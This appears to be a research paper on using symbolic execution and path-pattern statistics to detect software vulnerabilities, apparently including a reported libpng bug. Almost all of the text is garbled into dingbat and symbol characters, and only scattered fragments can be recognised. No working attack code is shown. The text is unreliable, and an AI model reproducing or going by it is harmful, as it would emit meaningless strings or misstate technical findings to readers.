✘✂ ✁ ☎ ✔♦ ✌ ➠ ❝ ♣ ✓
✘♣ ✁ ✆ ✰ ➢ ➢ ➢
✘✂ ✁ ☎ ✔ ♦ ✌
8➡ ➡ ✳✙ ➝✳ s
➤❺ ❶
➥❺ ❹ ❻ ❼ ❸➦ ☎ ☎ 5 ♣
✘✒ ♣ ✏ ☎ ✑ ☞ ✒ ✁ s ❜ ✏ ✇ ✂ ✏ ☛ ✔☎ 5 ☎ ☞ ♣
✘☞ ☎ ♣
✘ ❤✇ ♦ ☞
✘✆ ♦ ✑ ☎ ✁
❤✔♦ ✒ ☞ ❝ ☎♣ ✑ ✑
✘✂ ❝ ♣ ✏ ✂ ♦ ✁ ✔ ✍ ✂ ✁ ❝
✘✒ ✆ ✂ ✁  
✘✂ ❜ ✑ ✁   ❁ ✰
✼❃ ✍
✘✂ ❜ ✏ ✂ ✌ ✌ ❁ ✰ ➧ ❃ ✍
✘✂ ❜ ☎
1✂ ✌ ❁ ✰ ❂ ❃ ✍  ✂ ➟ ✂ ❜ ❁ ✰ ➨ ❃ ♣ ✁ ✆
✘✂ ❜ ✔✔☛ ❁ ✰
◗❃ ✳ ❚ ☛ ☎ ☎ 5 ♣
✘✒ ♣ ✏ ✂ ♦ ✁ ✇ ♣ ✔ ✑ ☎ ☞ ✌ ♦ ☞ ✓ ☎ ✆ ♦ ✁➦ ✂ ✁ ✆ ♦ ✇ ✔
73
✼3 ☎ ✁ ✏ ✂ ✒ ✓ ❄ ✒ ♣
✘ ✼✰ ➧ ➢ ✇ ✂ ✏ ☛
✼2 ✉ ✓ ☎ ✓ ♦ ☞ ✝ ✳➩ ➫ ➭ ➯ ➲ ➳ ❬❴ ❭ ➳ ➵ ❩ ❳ ❛ ➸ ➺ ❭ ❭ ❳ ❬➻✲ ♦ ☞ ☎ ♣ ❝ ☛ ✑ ♣ ✏ ☛
➼✍ ✇ ☎ ☎
1♣ ✓✂ ✁ ☎ ✏ ☛ ☎ ❝ ♦ ☞ ☞ ☎ ✔ ✑ ♦ ✁ ✆ ✂ ✁   ✔♦ ✒ ☞ ❝ ☎❝ ♦ ✆ ☎ ✏ ♦ ✆ ☎ ✏ ☎ ☞ ✓✂ ✁ ☎ ✏ ☛ ☎ ✌ ☎ ♣ ✔ ✂ ❜ ✂
✘✂ ✏ ✝ ♦ ✌ ✏ ☛ ☎ ✑ ♣ ✏ ☛ ✳
✙✌
➼✂ ✔ ✁ ♦ ✏q ✲ s t ♣ ✁ ✆ 3 ☞ ✒ ✁ s ❜ ✏ ❝ ♦ ✁ ❝
✘✒ ✆ ☎ ✆ ✏ ☛ ♣ ✏ ✂ ✏ ✂ ✔ q ✲ s t ✍
➼✇ ♣ ✔❝ ♦ ✒ ✁ ✏ ☎ ✆ ♣ ✔ ♣ ✌ ♣
✘✔☎
❤✑ ♦ ✔ ✂ ✏ ✂ 5 ☎ ❝ ♣ ✔☎ ✳
✙✌
➼✂ ✔ q ✲ s t ♣ ✁ ✆ ❝ ♦ ✁ ✏ ♣ ✂ ✁ ✔✂ ✁ ✏ ☎   ☎ ☞ ❜ ✒   ✔ ❜ ✒ ✏ ✑ ☞ ✒ ✁ s ❜ ✏ ❝ ♦ ✒
✘✆ ✁ ♦ ✏ ✆ ☎ ✏ ☎ ❝ ✏ ✂ ✏ ✍
➼✇ ♣ ✔ ❝ ♦ ✒ ✁ ✏ ☎ ✆♣ ✔ ♣ ✏ ☞ ✒ ☎
❤✁ ☎   ♣ ✏ ✂ 5 ☎ ❝ ♣ ✔☎ ✳ ❚ ♣ ❜
✘☎ ✰ ❜ ☎
✘♦ ✇ ✔☛ ♦ ✇ ✔ ✏ ☛ ☎ ☞ ☎ ✔ ✒
✘✏ ✔ ♦ ✌♦ ✒ ☞ ☎
1✑ ☎ ☞ ✂ ✓ ☎ ✁ ✏ ✔ ♦ ✁ ✏ ☛ ☎ ✔☎ ✔✝ ✔✏ ☎ ✓ ✔ ✳ ❚ ☛ ☎
➇☞ ✔✏ ❝ ♦
✘✒ ✓ ✁ ✆ ☎ ✁ ♦ ✏ ☎ ✔✏ ☛ ☎ ✁ ♣ ✓ ☎ ♦ ✌ ☎ ♣ ❝ ☛ ✔✝ ✔✏ ☎ ✓ ✔ ✳
8♦
✘✒ ✓ ✁ ✔ ➽ ✍ ➽➾ ➚
✆ ☎ ✁ ♦ ✏ ☎ ✔ ✏ ☛ ☎✏ ♦ ✏ ♣
✘✁ ✒ ✓ ❜ ☎ ☞ ♦ ✌ ✑ ♣ ✏ ☛ ✔ ♣ ✁ ✆ ✏ ☛ ☎ ✁ ✒ ✓ ❜ ☎ ☞ ♦ ✌ ✏ ☞ ✒
✘✝ ✑ ☞ ✒ ✁ ☎ ✆ ✑ ♣ ✏ ☛ ✔ ✳8♦
✘✒ ✓ ✁ ✔ ➽➪ ➶
♣ ✁ ✆ ➽➚➹
  ✂ 5 ☎ ✏ ☛ ☎ ✁ ✒ ✓ ❜ ☎ ☞ ♦ ✌ ✌ ♣
✘✔☎ ✑ ♦ ✔ ✂ ✏ ✂ 5 ☎❝ ♣ ✔☎ ✔ ♣ ✁ ✆ ✏ ☛ ☎ ✁ ✒ ✓ ❜ ☎ ☞ ♦ ✌ ✏ ☞ ✒ ☎ ✁ ☎   ♣ ✏ ✂ 5 ☎ ❝ ♣ ✔☎ ✔ ☞ ☎ ✔ ✑ ☎ ❝ ✏ ✂ 5 ☎
✘✝ ✳✲ ✂ ✁ ♣
✘ ✘✝ ✍ ❝ ♦
✘✒ ✓ ✁ ✔ ➽➘
✷ ➽➴
✷ ➽➷
  ✂ 5 ☎ ✏ ☛ ☎ ✁ ✒ ✓ ❜ ☎ ☞ ♦ ✌ ✑ ♣ ✏ ☛ ✔ ✆ ☎
❤✏ ☎ ❝ ✏ ☎ ✆ ❜ ✝ 3 ♣ ✏ ✏ ☎ ☞ ✁ ✰ ✍ 3 ♣ ✏ ✏ ☎ ☞ ✁
✼♣ ✁ ✆ 3 ♣ ✏ ✏ ☎ ☞ ✁ ➞ ☞ ☎ ✔ ✑ ☎ ❝ ✏ ✂ 5 ☎
✘✝ ✳❹
➬ ➮ ➱ ✃❻❷
❐ ❒ ❮ ❰ Ï Ð ❮ Ñ Ò Ó Ô Õ Ö Ð Ð Ó ❰ ×Ø Ù Ú Û Ü Ý Þ Þßà
Þá â
Þàã
Þä
Þå
Þæ❶
ç ➮ è é ê➉ ↕
➒➙ ➙
➣➉ ↕
➣ ➜ ➜ ➣➉ ↕
➣ ➜ ➜➱ ç ➮ë ë ì ➍ ➍
➒➛ ➉ ➛
→↔ ↕ ➉
➜ ➜ ➜➉
→➛
➣ ➒➉ ↕ ↔➱ ç ➮ ✃í
çî
➣➉ ➍
➜➉ ➉
➣➍
➜ ➜ ➜➉ ➉
➣➍
➜➱ ç ➮ ï çî î
➣➛ ➍ ➍ ➉ ➍ ↔ ➛
➜ ➜➉ ➍ ↔ ➛
➜ ➜ê ç ð ç ➮ →➍ ↕
➣↔
➒↔
→ ➜ ➜ ➒↔
→ ➜ ➜➱ ç ➮í ñ
➱➍ ➉ ➍ ➙
→➙
➒ ➒➙ ↕ ↕
➜ ➜ ➜➍ ➉ ↔ ➍ ➍ ➉ ↕
➜↕ ➙
➜ò ó Û ô õ ➉ ➙ ➍
➣➙ ➙
➣➉
→ ➜➉
➜ ➜➍ ➙
→ ➒ ➜➉ ➛ ↕ ➍
➣ ➒➉ ↕ ↔
98
❆     ✁ ✂ ✄ ☎ ✆ ✝ t ✁ ❚ ❛ ✞ ✟ ✠ ✶ ✡ P ✂ ☛ ✆ ☞ ✞ t ✄ ✠ t ✠   t ✠ ✄ ✺ ✶ ✌ ✍ ✶ ◆ ✎ ☞ ✏♣ ❛ t ✑ ✒✓ ❚ ✑ ✠ ✂ ✠ ✇ ❛ ✒ ✆ ✁ ❢ ❛ ✟ ✒ ✠ ♣ ✁ ✒☎ t ☎ ✈ ✠   ❛ ✒ ✠ ✓ ❆ ✒ ✒☛   ✑ t ✑ ✠ ♣ ✂ ✁ ♣ ✁ ✒ ✠ ✄❛ ♣ ♣ ✂ ✁ ❛   ✑ ✒☛     ✠ ✒✒❢ ☛ ✟ ✟ s ✄ ✠ t ✠   t ✠ ✄ ✷ ✔ ✓ ✶ ✕ ◆ ✎ ☞ ✏ ✁ ❢ ❛ ✟ ✟ t ✑ ✠ ♣ ❛ t ✑ ✒✓❚ ✑ ✠ ♣ ✠ ✂   ✠ ✆ t ❛ ✝ ✠ ✁ ❢ ◆ ✎ ☞ ✏ ♣ ❛ t ✑ ✒ ✄ ✠ t ✠   t ✠ ✄ ✞ s ✠ ❛   ✑ ♣ ❛ t t ✠ ✂ ✆✁ ✈ ✠ ✂ ❛ ✟ ✟ t ✑ ✠ ◆ ✎ ☞ ✏ ♣ ❛ t ✑ ✒ ✄ ✠ t ✠   t ✠ ✄ ☎ ✒ ❛ ✒ ❢ ✁ ✟ ✟ ✁ ✇ ✒
✖✺ ✺ ✓ ✌ ✕ ✇ ✠ ✂ ✠✄ ✠ t ✠   t ✠ ✄ ✞ s P ❛ t t ✠ ✂ ✆ ✶ ✡
✸✔ ✓ ✌ ✕ ✇ ✠ ✂ ✠ ✄ ✠ t ✠   t ✠ ✄ ✞ s P ❛ t t ✠ ✂ ✆ ✷ ✡✌ ✌ ✓ ✹ ✕ ✇ ✠ ✂ ✠ ✄ ✠ t ✠   t ✠ ✄ ✞ s P ✂ ✁ ♣ ✠ ✂ t s
✸❛ ✆ ✄ ✁ ✆ ✟ s ✹ ✓ ✶ ✕ ✇ ❛ ✒✄ ✠ t ✠   t ✠ ✄ ✞ s P ❛ t t ✠ ✂ ✆
✸✓❇ ✗ ❙ ✘ ✙ ✘ ✚ ✛ ✘ ✚ ✜ ✙ ✢ ❱ ✙ ✢ ✚ ✣ ✙ ✘ ✚ ✤ ✥■ ✆ t ✑ ☎ ✒ ✒ ✠   t ☎ ✁ ✆ ✡ ✇ ✠ ✂ ✠ ♣ ✁ ✂ t t ✑ ✠ ✂ ✠ ✒☛ ✟ t ✒ ✁ ❢ ✞ ☎ ✆ ✁ ❜ ☎ ❛ ✟ t ✠ ✒ t ☎ ✆ ✝❬ ✷ ✍ ✦ t ✁ ✒ t ❛ t ☎ ✒ t ☎   ❛ ✟ ✟ s ✈ ❛ ✟ ☎ ✄ ❛ t ✠ ✠ ❜ ♣ ☎ ✂ ☎   ❛ ✟ ♣ ❛ t t ✠ ✂ ✆ ✒ ♣ ✂ ✠ ✒ ✠ ✆ t ✠ ✄ ☎ ✆t ✑ ✠ ♣ ✂ ✠ ✈ ☎ ✁ ☛ ✒ ✒ ✠   t ☎ ✁ ✆ ✆ ❛ ❜✠ ✟ s P ❛ t t ✠ ✂ ✆ ✶ ✡ ✷ ❛ ✆ ✄
✸✓ ✎ ✁ ✂ ✠ ❛   ✑✠ ❜ ♣ ☎ ✂ ☎   ❛ ✟ ♣ ❛ t t ✠ ✂ ✆
✧✡ t ✑ ✠ ❛ ✟ t ✠ ✂ ✆ ❛ t ✠ ✑ s ♣ ✁ t ✑ ✠ ✒☎ ✒ ✒ t ❛ t ✠ ✒ t ✑ ❛ t t ✑ ✠♣ ❛ t t ✠ ✂ ✆ ✑ ✁ ✟ ✄ ✒ ❢ ✁ ✂ ✠
❡☛ ❛ ✟ ✁ ✂ ❜✁ ✂ ✠ t ✑ ❛ ✆
✾ ★✕ ✁ ❢ t ✑ ✠   ❛ ✒ ✠ ✒✓ ❆ ✆ ✄ ✡t ✑ ✠ ✂ ✠ ❢ ✁ ✂ ✠ ✡ t ✑ ✠ ✆ ☛ ✟ ✟ ✑ s ♣ ✁ t ✑ ✠ ✒☎ ✒ ✒ t ❛ t ✠ ✒ t ✑ ❛ t t ✑ ✠ ♣ ❛ t t ✠ ✂ ✆ ✑ ✁ ✟ ✄ ✒❢ ✁ ✂ ✟ ✠ ✒✒ t ✑ ❛ ✆
✾ ★✕ ✁ ❢ t ✑ ✠   ❛ ✒ ✠ ✒✓ ❚ ✑ ❛ t ☎ ✒
✖9 ❍✵
✭ ✆ ☛ ✟ ✟ ✑ s ♣ ✁ t ✑ ✠ ✒☎ ✒❤
✖♣ ✭
✧✑ ✁ ✟ ✄ ✒❤ ❁ ✍ ✓
✾ ★✓9 ❍✩
✭ ❛ ✟ t ✠ ✂ ✆ ❛ t ✠ ✑ s ♣ ✁ t ✑ ✠ ✒☎ ✒❤
✖♣ ✭
✧✑ ✁ ✟ ✄ ✒❤
✪✍ ✓
✾ ★✓❚ ✑ ✠ ✞ ☎ ✆ ✁ ❜ ☎ ❛ ✟ t ✠ ✒ t ✒ t ❛ t ☎ ✒ t ☎   ✒
3 ❂
❳ ✫♥ ❾✬✮✬
✯✩ ❾✬
✰✫♥
✇ ✑ ✠ ✂ ✠ ✆ ☎ ✒ t ✑ ✠t ✁ t ❛ ✟ ✒ ❛ ❜ ♣ ✟ ✠ ✒☎ ✱ ✠ ❢ ✁ ✂ t ✑ ✠ t ✠ ✒ t ❛ ✆ ✄ ✲ ☎ ✒ t ✑ ✠ ✆ ☛ ❜✞ ✠ ✂ ✁ ❢   ❛ ✒ ✠ ✒t ✑ ❛ t ✒☛ ♣ ♣ ✁ ✂ t t ✑ ✠ ❛ ✟ t ✠ ✂ ✆ ❛ t ☎ ✈ ✠ ✑ s ♣ ✁ t ✑ ✠ ✒☎ ✒ ✏ ✶ ✓ ❚ ❛ ✳ ☎ ✆ ✝ ✍ ✓ ✍ ✍ ✶❛ ✒ t ✑ ✠ t s ♣ ✠ ■ ✠ ✂ ✂ ✁ ✂ ✭ ✎ ❛ ✟ ✒ ✠ P ✁ ✒☎ t ☎ ✈ ✠ ✒❤ ✡ ✁ t ✑ ✠ ✂ ✇ ☎ ✒ ✠ ✇ ✠ ❛     ✠ ♣ t t ✑ ✠✑ s ♣ ✁ t ✑ ✠ ✒☎ ✒✓❆ ✟ ✟ t ✑ ✠   ❛ ✒ ✠ ✒ ☎ ✆ t ✑ ✠ ✒ ❛ ❜ ♣ ✟ ✠ ❢ ✁ ✂ t ✠ ✒ t ☎ ✆ ✝ ✠ ❛   ✑ ✑ s ♣ ✁ t ✑ ✠ ✒☎ ✒✝ ❛ ✈ ✠ ❛ ❢
➇✂ ❜❛ t ☎ ✈ ✠ ✂ ✠ ✒ ☛ ✟ t ✓ ❚ ✑ ✠ ✂ ✠ ❢ ✁ ✂ ✠ ✡ t ✑ ✠ ✱
✴✒  ✁ ✂ ✠ ✁ ❢ ✞ ☎ ✆ ✁ ❜ ☎ ❛ ✟t ✠ ✒ t ❢ ✁ ✂ P ❛ t t ✠ ✂ ✆ ✶ ✡ ✷ ❛ ✆ ✄
✸❛ ✂ ✠ ✷
✾✓ ✺ ✭ ✲
✻✷ ✔ ✌
✸✍ ✡ ✆
✻✷ ✔ ✌
✸✍ ✡♣
✻✍ ✓
✾ ★❤ ✡ ✷ ✌ ✓
★✭ ✲
✻✶
✾ ★✷ ✺ ✡ ✆
✻✶
✾ ★✷ ✺ ✡ ♣
✻✍ ✓
✾ ★❤ ❛ ✆ ✄
✾✓ ✔ ✭ ✲✻ ✸✶
★✹ ✡ ✆
✻ ✸✶
★✹ ✡ ♣
✻✍ ✓
✾ ★❤ ✂ ✠ ✒♣ ✠   t ☎ ✈ ✠ ✟ s ✓ ❆ ✒ ❛ ✟ ✟ t ✑ ✠ ✱
✴  ✁ ✂ ✠ ✒❛ ✂ ✠ ✝ ✂ ✠ ❛ t ✠ ✂ t ✑ ❛ ✆
✸✓ ✶ ✡ ✇ ✠   ✁ ✆   ✟ ☛ ✄ ✠ t ✑ ❛ t P ❛ t t ✠ ✂ ✆ ✶ ✡ ✷ ❛ ✆ ✄
✸✑ ✁ ✟ ✄ ❢ ✁ ✂ ✠
❡☛ ❛ ✟ ✁ ✂ ❜✁ ✂ ✠ t ✑ ❛ ✆
✾ ★✕ ✁ ❢ ❛ ✟ ✟ t ✑ ✠   ❛ ✒ ✠ ✒ ❛ t ✍ ✓ ✶ ✕✟ ✠ ✈ ✠ ✟ ✁ ❢ ✒☎ ✝ ✆ ☎
➇  ❛ ✆   ✠ ✓❈
✗❩ ✼ ✽
✤♦
✣ ✙✿
❇❀ ❃
✛ ✚ ✥▲
✚❄ ❅
✥❃❉☎ ✞ ♣ ✆ ✝ ❬ ✶ ✷ ✦ ☎ ✒ ✇ ☎ ✄ ✠ ✟ s ☛ ✒ ✠ ✄ ☎ ❜❛ ✝ ✠ ✂ ✠   ✁ ✝ ✆ ☎ t ☎ ✁ ✆ ✟ ☎ ✞ ✂ ❛ ✂ s ✓ ❚ ✑ ✠  ☛ ✂ ✂ ✠ ✆ t ✈ ✠ ✂ ✒☎ ✁ ✆ ☎ ✒ ✶ ✓ ✺ ✓ ✶
✸✓ ❚ ✑ ✂ ✁ ☛ ✝ ✑ ❛ ♣ ♣ ✟ s ☎ ✆ ✝ t ✠ ✒ t ☎ ✆ ✝ t ✁ t ✑ ✠✟ ☎ ✞ ♣ ✆ ✝ ✶ ✓ ✺ ✓ ✶
✸✡ ✇ ✠ ❢ ✁ ☛ ✆ ✄ t ✑ ❛ t ✟ ☎ ✞ ♣ ✆ ✝ ✑ ❛ ✒ ✁ ✆ ✠ ✱ ✠ ✂ ✁
✴✄ ❛ s ☎ ✆ t ✠
✴✝ ✠ ✂ ✁ ✈ ✠ ✂ ❊ ✁ ✇ ✞ ☛ ✝ ☎ ✆ ♣ ✆ ✝ ✒ ✠ t ☛ ✆ ✳ ✆ ✁ ✇ ✆   ✑ ☛ ✆ ✳ ✒ ☎ ✆ ✟ ☎ ✞ ♣ ✆ ✝
❧♣
✴✆ ✝ ✒ ✠ t ✓   ✓ ❚ ✑ ✠ ✄ ✠ t ❛ ☎ ✟ ☎ ✒ ☎ ✆ ✎ ☎ ✝ ☛ ✂ ✠ ✌ ✓ ❚ ✑ ✠ ✞ ☛ ✝ ☎ ✒ ✟ ✁   ❛ t ✠ ✄ ☎ ✆ ✟ ☎ ✆ ✠✶ ✍
✸ ★✓ ■ ❢ ✆ ☛ ❜ ☛ ✆ ✳ ✆ ✁ ✇ ✆ ✒ ✁ ✂ ✆ ❢ ✁ ♣ t ✂ ❋ ☛ ✆ ✳ ✆ ✁ ✇ ✆   ✑ ☛ ✆ ✳ ✒ ✆ ☛ ❜☎ ✒ ✈ ✠ ✂ s ✟ ❛ ✂ ✝ ✠ ✡ t ✑ ✠ ✆ ☎ ✆ ❢ ✁ ♣ t ✂ ❋ ☛ ✆ ✳ ✆ ✁ ✇ ✆   ✑ ☛ ✆ ✳ ✒ ✆ ☛ ❜ ●✆ ☛ ❜ ☛ ✆ ✳ ✆ ✁ ✇ ✆ ✒❤
❏♣ ✆ ✝ ✒☎ ✱ ✠ ✁ ❢ ✭ ♣ ✆ ✝ ☛ ✆ ✳ ✆ ✁ ✇ ✆   ✑ ☛ ✆ ✳ ❤ ❤ ☎ ✒✟ ❛ ✂ ✝ ✠ ✂ t ✑ ❛ ✆
❯■ ◆ ❚
▼❆ ✲ ✓ ■ t ✞ ✠   ✁ ❜✠ ✒ ✒ ❜❛ ✟ ✟ ✠ ✂ ✄ ☛ ✠ t ✁ ☎ ✆ t ✠ ✝ ✠ ✂✁ ✈ ✠ ✂ ❊ ✁ ✇ ✓ ❚ ✑ ☛ ✒ ✆ ♣
✻♣ ✆ ✝ ❜❛ ✟ ✟ ✁   ✇ ❛ ✂ ✆ ☎ ✆ ✟ ☎ ✆ ✠ ✶ ✍
✸✹ ✇ ☎ ✟ ✟✝ ✠ t ❛ ✒ ❜❛ ✟ ✟ ✠ ✂ ❜✠ ❜✁ ✂ s t ✑ ❛ ✆ ✠ 1 ♣ ✠   t ✠ ✄ ✓ ❚ ✑ ✠ ✆ ♣ ✆ ✝ ❜✠ ❜   ♣ s ☎ ✆✟ ☎ ✆ ✠ ✶ ✍ ✌
★❜❛ s ❛     ✠ ✒✒ ☎ ✆ ✈ ❛ ✟ ☎ ✄ ❜✠ ❜✁ ✂ s ❛ ✄ ✄ ✂ ✠ ✒✒ ✡ ✇ ✑ ☎   ✑   ❛ ☛ ✒ ✠ ✒✒ ✠ ✝ ❜✠ ✆ t ❛ t ☎ ✁ ✆ ❢ ❛ ☛ ✟ t ✡ ✁ ✂ ☛ ✆ ✠ 1 ♣ ✠   t ✠ ✄ ✂ ✠ ✒☛ ✟ t ✒✓❑ s ✂ ✠ ♣ ✁ ✂ t ☎ ✆ ✝ t ✑ ☎ ✒ ✞ ☛ ✝ t ✁ ✟ ☎ ✞ ♣ ✆ ✝ ✄ ✠ ✈ ✠ ✟ ✁ ♣ ✠ ✂ ✡ t ✑ ✠ s   ✁ ✆
➇✂ ❜✠ ✄t ✑ ☎ ✒ ✞ ☛ ✝ ❛ ✆ ✄
➇1 ✠ ✄ ☎ t ☎ ✆ ✈ ✠ ✂ ✒☎ ✁ ✆ ✶ ✓ ✺ ✓ ✶ ✌ ✞ ✠ t ❛ ✍ ✔ ✓❖✓
❘ ◗ ❲ ❨ ❭ ◗ ❪ ❫ ❴ ❵ ❝❚ ✑ ✠ ✂ ✠ ❛ ✂ ✠ ❜❛ ✆ s ❛ ♣ ♣ ✟ ☎   ❛ t ☎ ✁ ✆ ✒ ☎ ✆ ☛ ✒☎ ✆ ✝ ✒s ❜✞ ✁ ✟ ☎   ✠ 1 ✠   ☛ t ☎ ✁ ✆t ✁ ✄ ✠ t ✠   t ✒ ✁ ❢ t ✇ ❛ ✂ ✠ ✈ ☛ ✟ ✆ ✠ ✂ ❛ ✞ ☎ ✟ ☎ t ☎ ✠ ✒✓ P ✂ ✠
➇1 ❬ ✷ ✶ ✦ ✁ ✆ ✟ s ✠ 1 ♣ ✟ ✁ ✂ ✠ ✒ ❛➇1 ✠ ✄ ✆ ☛ ❜✞ ✠ ✂ ✁ ❢ ♣ ❛ t ✑ ✒ ☎ ✆ ♣ ✂ ❛   t ☎   ✠ ✡ ♣ ✁ ✒✒☎ ✞ ✟ s ❜ ☎ ✒✒☎ ✆ ✝ ✠ ✂ ✂ ✁ ✂ ✒✓
❞ ❣ ✐ ❥ ❦ ♠ q r ♠ ❦ ✉ 2 4 ❦ 5 ❦ 6 7 ❦ 2 8 10 4 ❦ 5 ♠ ❶♠ ❦ ✉ 2❷ ❸ ❹ ❹
6 8 2 7❸ ❺
❦ r ♠ ❦ ✉ 2 ♠❻ ❺ ❼❞ ❣ ✐❽
r ♠ ❦ ✉ 2❿ ➀ ➁ ➂
2❻
❶ r➀
❦➃
6 2 ♠❻ ❺ ➄ ➅4 ❦ 5 ❦ 6 7 ❦ 2 8 10 4 ❦ 5❿
2 ❦ 4❷ ➆❦ 4❷
2 4 ❦ 5 ❦ 6 7 ❦❿
❶❞ ❣ ✐ ➈ ♠ ❦ ✉ 2❿ ➀ ➁ ➂
6➃
r♠ ❦ ✉ 2 4 ❦ 5 ❦ 6 7 ❦ 2 8 10 4 ❦ 5 ❶ ❶ ➉❞ ❣ ✐➊❞ ❣➋
❣➀ ➃
r ❦ ♠ q q➌ ➍ ➎ ➎
❶❞ ❣➋
❞➏❞ ❣➋
➐ ♠ ❦ ✉ 2 7❸ ❺
❦➀
❦ ✉ r ♠ ❦ ✉ 2 ♠❻ ❺ ❼❞ ❣➋
✐ ➑ ➒ 4❻
6➃ ❷ ➂ ❷
6❺
➓ 7 10➀ ❹ ➂♠❺
6 8➂ ❿ ❿ ➀
❦ ✉ 4 ❦ 5 ❦ 6 7 ❦ 8 10 4 ❦ 5 ➑ ❶➉❞ ❣➋ ➋ ❺ ➂ ❻
4❺
❦ ➉❞ ❣➋ ➔ →❞ ❣➋
❥❞ ❣➋ ❽
♠ ❦ ✉ 2❷ ➂ ❷
8 ♠ ➓ r ❦ ♠❼ ➀
❦➃
6 2 ♠❻ ❺ ➄ ➅4 ❦ 5 ❦ 6 7 ❦ 2 8 10 4 ❦ 5❿ ❼❞ ❣➋
➈ r ♠ ❦ ✉ 2❿ ➀ ➁ ➂
2❻
❶➀
❦➃
6 2 ♠❻ ❺ ➄ ➅4 ❦ 5 ❦ 6 7 ❦ 2 8 10 4 ❦ 5❿
2 ❦ 4❷❞ ❣➋ ➊
♠ ❦ ✉ 2❿ ➀ ➁ ➂
6➃
r ♠ ❦ ✉ 2 4 ❦ 5 ❦ 6 7 ❦ 2 8 10 4 ❦ 5 ❶ ❶ ➉➣ ↔ ↕ ➙ ➛➜ ➋ ➝ ➞ ➜ ➛➟ ➠➡ ➢ ➤ ➥ ➙ ↕ ↔ ➦
❲↔ ➥ ➧ ➦ ↕❘✠   ✠ ✆ t ✟ s ✡ ✒ ✠ ✈ ✠ ✂ ❛ ✟ t ✁ ✁ ✟ ✒ ✟ ☎ ✳ ✠ ✒☛   ✑ ❛ ✒ ☞ ✲ ☞ ❬
✸✦ ✡   ☛ t ✠ ❬ ✌ ✦ ❛ ✆ ✄➨ ❆
❘❚ ❬ ✺ ✦ ✡ ☛ t ☎ ✟ ☎ ✱ ✠ ✒s ❜✞ ✁ ✟ ☎   ✠ 1 ✠   ☛ t ☎ ✁ ✆ ❢ ✁ ✂ ✄ s ✆ ❛ ❜ ☎   t ✠ ✒ t ✝ ✠ ✆ ✠ ✂
✴❛ t ☎ ✁ ✆ ✭   ✁ ✆   ✁ ✟ ☎   ✠ 1 ✠   ☛ t ☎ ✁ ✆ ❤ ✓ ❚ ✑ ✠ s ☎ ✆ ✒ ✠ ✂ t ❛ ✒s ❜ ✞ ✁ ✟ ☎   ✠ 1 ✠   ☛ t ☎ ✁ ✆✠ ✆ ✝ ☎ ✆ ✠ ☎ ✆ t ✁ ♣ ✂ ✁ ✝ ✂ ❛ ❜ ✒ ✁ ☛ ✂   ✠   ✁ ✄ ✠ ❛ ✆ ✄ ☛ ✒ ✠ ❛ ❜ ☎ 1 ✠ ✄ ✠ 1 ✠   ☛ t ☎ ✁ ✆t ✁ ✝ ✠ ✆ ✠ ✂ ❛ t ✠ t ✠ ✒ t ☎ ✆ ♣ ☛ t ✒ ✁ ✂
➇✆ ✄ ♣ ✁ t ✠ ✆ t ☎ ❛ ✟ ✞ ☛ ✝ ✒ ✁ ✆ ❢ ✠ ❛ ✒☎ ✞ ✟ ✠♣ ❛ t ✑ ✒✓
➩❆
➫☞ ❬ ✷ ✷ ✦
➇✂ ✒ t ✟ s ☎ ❜ ♣ ✟ ✠ ❜✠ ✆ t ✒ ❛ ☛ t ✁ ❜❛ t ✠ ✄ ✇ ✑ ☎ t ✠ ✞ ✁ 1❢ ☛ ✱ ✱ ☎ ✆ ✝ ✓
▼✁ ✟ ✆ ❛ ✂ ✠ t ❛ ✟ ✓ ❬ ✷
✸✦ ♣ ✂ ✠ ✒ ✠ ✆ t ✠ ✄ ❛ t ✁ ✁ ✟   ❛ ✟ ✟ ✠ ✄
➩❜❛ ✂ t ✎ ☛ ✱ ✱✇ ✑ ☎   ✑ ☛ ✒ ✠ ✒ ✄ s ✆ ❛ ❜ ☎   ✒s ❜✞ ✁ ✟ ☎   ✠ 1 ✠   ☛ t ☎ ✁ ✆ t ✁
➇✆ ✄ ☎ ✆ t ✠ ✝ ✠ ✂✂ ✠ ✟ ❛ t ✠ ✄ ✈ ☛ ✟ ✆ ✠ ✂ ❛ ✞ ☎ ✟ ☎ t ☎ ✠ ✒ ☎ ✆ 1 ✔ ✹ ✞ ☎ ✆ ❛ ✂ ☎ ✠ ✒✓✏ ✁ ✇ ✠ ✈ ✠ ✂ ✡ t ✑ ✠ ✒ ✠ ❛ ♣ ♣ ✂ ✁ ❛   ✑ ✠ ✒ ✒ t ☎ ✟ ✟ ✒☛ ❢ ❢ ✠ ✂ ✒ ❢ ✂ ✁ ❜ t ✑ ✠ ✒  ❛ ✟ ❛ ✞ ☎ ✟
✴☎ t s ♣ ✂ ✁ ✞ ✟ ✠ ❜ ☎ ✆ ♣ ✂ ❛   t ☎   ✠ ✓ ❚ ✁ ❛ ✈ ✁ ☎ ✄ ♣ ❛ t ✑ ✠ 1 ♣ ✟ ✁ ✒☎ ✁ ✆ ♣ ✂ ✁ ✞ ✟ ✠ ❜✡❜❛ ✆ s ❛ ♣ ♣ ✂ ✁ ❛   ✑ ✠ ✒ ✂ ✠ ✟ s ✁ ✆ ✒s ❜✞ ✁ ✟ ☎   ✠ ✈ ❛ ✟ ☛ ❛ t ☎ ✁ ✆ ❬ ✷ ✌ ✦ ✡ ❬ ✷ ✺ ✦ ✓ ❚ ✁  ✑ ✠   ✳ ✇ ✑ ✠ t ✑ ✠ ✂ ❛ ♣ ❛ t ✑ ☎ ✒ ☎ ✆ ❢ ✠ ❛ ✒☎ ✞ ✟ ✠ ✡ t ✑ ✠ ♣ ❛ t ✑ ☎ ✒ ✒s ❜✞ ✁ ✟ ☎   ❛ ✟ ✟ s✠ 1 ✠   ☛ t ✠ ✄ t ✁ ✝ ✠ ✆ ✠ ✂ ❛ t ✠ ❛ ✒s ❜✞ ✁ ✟ ☎   ✠ 1 ♣ ✂ ✠ ✒✒☎ ✁ ✆ ✂ ✠ ♣ ✂ ✠ ✒ ✠ ✆ t ☎ ✆ ✝t ✑ ✠ ♣ ❛ t ✑ ✓ ❚ ✑ ☎ ✒ ✠ 1 ♣ ✂ ✠ ✒✒☎ ✁ ✆ ☎ ✒ t ✑ ✠ ✆ ✒ ✁ ✟ ✈ ✠ ✄ ✞ s ❛   ✁ ✆ ✒ t ✂ ❛ ☎ ✆ t✒ ✁ ✟ ✈ ✠ ✂ t ✁ ✄ ✠ t ✠ ✂ ❜ ☎ ✆ ✠ t ✑ ✠ ☎ ✆ ❢ ✠ ❛ ✒☎ ✞ ☎ ✟ ☎ t s ✁ ❢ t ✑ ✠ ♣ ❛ t ✑ ✓
